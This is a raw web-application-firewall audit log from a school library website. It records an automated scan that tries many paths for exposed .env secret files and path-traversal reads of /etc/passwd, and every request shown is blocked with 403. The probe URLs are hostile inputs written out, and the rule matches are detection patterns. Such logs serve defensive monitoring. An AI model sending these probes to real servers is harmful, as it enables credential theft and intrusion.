Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --186bd275-Z-- --72732e37-A-- [14/Jun/2025:15:52:23 +0700] aE04R0MWfhkd5Y0sFtogywAAAIk 103.236.140.4 34722 103.236.140.4 8181 --72732e37-B-- GET /myproject/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373575 --72732e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --72732e37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891143924199 694 (- - -) Stopwatch2: 1749891143924199 694; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72732e37-Z-- --1f9d625b-A-- [14/Jun/2025:15:52:24 +0700] aE04SEMWfhkd5Y0sFtogzAAAAIw 103.236.140.4 34738 103.236.140.4 8181 --1f9d625b-B-- GET /.envs/.production/.django HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373581 --1f9d625b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1f9d625b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891144919392 805 (- - -) Stopwatch2: 1749891144919392 805; combined=309, p1=275, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f9d625b-Z-- --09606166-A-- [14/Jun/2025:15:52:26 +0700] aE04SmmwZ6YUkjOdtI7-NQAAABE 103.236.140.4 34768 103.236.140.4 8181 --09606166-B-- GET /react-app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373593 --09606166-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09606166-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891146314882 673 (- - -) Stopwatch2: 1749891146314882 673; combined=234, p1=208, p2=0, p3=0, p4=0, p5=26, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09606166-Z-- --20177466-A-- [14/Jun/2025:15:52:26 +0700] aE04SkMWfhkd5Y0sFtog0QAAAJI 103.236.140.4 34782 103.236.140.4 8181 --20177466-B-- GET /react-app/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373599 --20177466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --20177466-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891146902909 868 (- - -) Stopwatch2: 1749891146902909 868; combined=331, p1=294, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20177466-Z-- --bd8b7b2b-A-- [14/Jun/2025:15:52:43 +0700] aE04W2mwZ6YUkjOdtI7-bgAAABE 103.236.140.4 35094 103.236.140.4 8181 --bd8b7b2b-B-- GET /pdf-generator/?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373740 --bd8b7b2b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bd8b7b2b-E-- --bd8b7b2b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /pdf-generator/?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891163246585 1579 (- - -) Stopwatch2: 1749891163246585 1579; combined=458, p1=337, p2=98, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd8b7b2b-Z-- --49696671-A-- [14/Jun/2025:15:52:43 +0700] aE04W2mwZ6YUkjOdtI7-cgAAAAk 103.236.140.4 35108 103.236.140.4 8181 --49696671-B-- GET /download.cgi?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373746 --49696671-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --49696671-E-- --49696671-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.cgi?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891163644986 1783 (- - -) Stopwatch2: 1749891163644986 1783; combined=442, p1=353, p2=67, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49696671-Z-- --a3e58063-A-- [14/Jun/2025:15:52:44 +0700] aE04XEMWfhkd5Y0sFtog5gAAAIU 103.236.140.4 35126 103.236.140.4 8181 --a3e58063-B-- GET /somepath?path=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676749 --a3e58063-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a3e58063-E-- --a3e58063-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /somepath?path=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891164866133 2053 (- - -) Stopwatch2: 1749891164866133 2053; combined=606, p1=444, p2=131, p3=0, p4=0, p5=30, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3e58063-Z-- --58560c25-A-- [14/Jun/2025:15:52:47 +0700] aE04X2IDXuKmWNi2UBTnXwAAAEQ 103.236.140.4 35170 103.236.140.4 8181 --58560c25-B-- GET /admin/media/download_private_file?file=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373772 --58560c25-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --58560c25-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:file. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:file: ../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891167268467 2138 (- - -) Stopwatch2: 1749891167268467 2138; combined=884, p1=434, p2=324, p3=0, p4=0, p5=126, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58560c25-Z-- --09b7e21f-A-- [14/Jun/2025:15:52:49 +0700] aE04YWmwZ6YUkjOdtI7-ewAAAAY 103.236.140.4 35208 103.236.140.4 8181 --09b7e21f-B-- GET /download?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676785 --09b7e21f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09b7e21f-E-- --09b7e21f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891169107329 28711 (- - -) Stopwatch2: 1749891169107329 28711; combined=54238, p1=440, p2=112, p3=0, p4=0, p5=26858, sr=78, sw=0, l=0, gc=26828 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09b7e21f-Z-- --e3426c41-A-- [14/Jun/2025:15:52:50 +0700] aE04YmmwZ6YUkjOdtI7-hAAAAA8 103.236.140.4 35238 103.236.140.4 8181 --e3426c41-B-- GET /fileviewer?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373799 --e3426c41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e3426c41-E-- --e3426c41-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /fileviewer?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891170874366 2218 (- - -) Stopwatch2: 1749891170874366 2218; combined=586, p1=432, p2=123, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3426c41-Z-- --2546402a-A-- [14/Jun/2025:15:52:52 +0700] aE04ZGmwZ6YUkjOdtI7-jAAAABE 103.236.140.4 35272 103.236.140.4 8181 --2546402a-B-- GET /admin/download.cgi?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373814 --2546402a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2546402a-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:file. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:file: ../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891172753824 2576 (- - -) Stopwatch2: 1749891172753824 2576; combined=818, p1=468, p2=320, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2546402a-Z-- --09f9d74a-A-- [14/Jun/2025:15:52:54 +0700] aE04ZkMWfhkd5Y0sFtog9AAAAJY 103.236.140.4 35302 103.236.140.4 8181 --09f9d74a-B-- GET /api/v1/resources?path=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676827 --09f9d74a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --09f9d74a-E-- --09f9d74a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/v1/resources?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891174339434 2190 (- - -) Stopwatch2: 1749891174339434 2190; combined=597, p1=454, p2=112, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09f9d74a-Z-- --742e2447-A-- [14/Jun/2025:15:52:58 +0700] aE04al3g_boun6Rx5jIBygAAANE 103.236.140.4 35378 103.236.140.4 8181 --742e2447-B-- GET /download?file=../../../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676860 --742e2447-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --742e2447-E-- --742e2447-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download?file=../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891178573567 2149 (- - -) Stopwatch2: 1749891178573567 2149; combined=688, p1=439, p2=210, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --742e2447-Z-- --ec365c7b-A-- [14/Jun/2025:15:53:05 +0700] aE04cV3g_boun6Rx5jIB2AAAANA 103.236.140.4 35484 103.236.140.4 8181 --ec365c7b-B-- GET /media/download?file=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 174676902 --ec365c7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ec365c7b-E-- --ec365c7b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /media/download?file=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891185111495 2107 (- - -) Stopwatch2: 1749891185111495 2107; combined=452, p1=341, p2=88, p3=0, p4=0, p5=23, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec365c7b-Z-- --bf79454f-A-- [14/Jun/2025:15:53:07 +0700] aE04c13g_boun6Rx5jIB4QAAAMQ 103.236.140.4 35522 103.236.140.4 8181 --bf79454f-B-- GET /report?file=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373919 --bf79454f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf79454f-E-- --bf79454f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /report?file=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749891187039288 1897 (- - -) Stopwatch2: 1749891187039288 1897; combined=576, p1=431, p2=115, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf79454f-Z-- --5252057c-A-- [14/Jun/2025:15:53:11 +0700] aE04d2IDXuKmWNi2UBTndgAAAFE 103.236.140.4 35606 103.236.140.4 8181 --5252057c-B-- GET /file.php?f=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180373955 --5252057c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5252057c-E-- --5252057c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /file.php?f=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749891191571205 2188 (- - -) Stopwatch2: 1749891191571205 2188; combined=550, p1=417, p2=106, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5252057c-Z-- --4c419279-A-- [14/Jun/2025:15:53:59 +0700] aE04p13g_boun6Rx5jICeAAAANQ 103.236.140.4 36630 103.236.140.4 8181 --4c419279-B-- GET /volumes/download?file=../../../../../../var/lib/docker/volumes/app_data/_data/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 107.150.0.115 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Accept: */* Cookie: X-Forwarded-For: 107.150.0.115 Accept-Encoding: gzip X-Varnish: 180374384 --4c419279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4c419279-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749891239967855 819 (- - -) Stopwatch2: 1749891239967855 819; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
